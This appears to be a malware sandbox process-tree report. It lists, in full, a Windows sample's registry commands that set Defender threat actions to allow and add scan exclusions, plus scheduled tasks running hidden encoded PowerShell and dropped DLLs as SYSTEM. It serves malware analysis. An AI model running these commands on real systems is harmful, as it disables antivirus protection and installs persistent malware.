C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pJxacTbbSlizmPVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZKIEJJPSRIlthXTT /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gytCVypMN" /SC once /ST 06:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gytCVypMN"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gytCVypMN"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 04:26:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\33E8.tmp.exeC:\Users\Admin\AppData\Local\Temp\33E8.tmp.exe1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\436A.tmp.exeC:\Users\Admin\AppData\Local\Temp\436A.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\56A5.tmp.exeC:\Users\Admin\AppData\Local\Temp\56A5.tmp.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 11242⤵
- Program crash
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4152 -s 20682⤵
- Program crash
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\SxjcCox.exe V8 /site_id 754 /S1⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\RmTWIJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\ocAwAqy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\fwrEYVm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\uDouXPq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\CglJrVA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\ETfSDLy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 01:42:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll\",#1 /site_id 754" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hMZOFgVuABkGdcuhk"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuNwBvNokDa" /SC once /ST 10:26:05 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exe\" U4 /S"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuNwBvNokDa"2⤵
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x40c1⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll",#1 /site_id 7541⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll",#1 /site_id 7542⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exe U4 /S1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
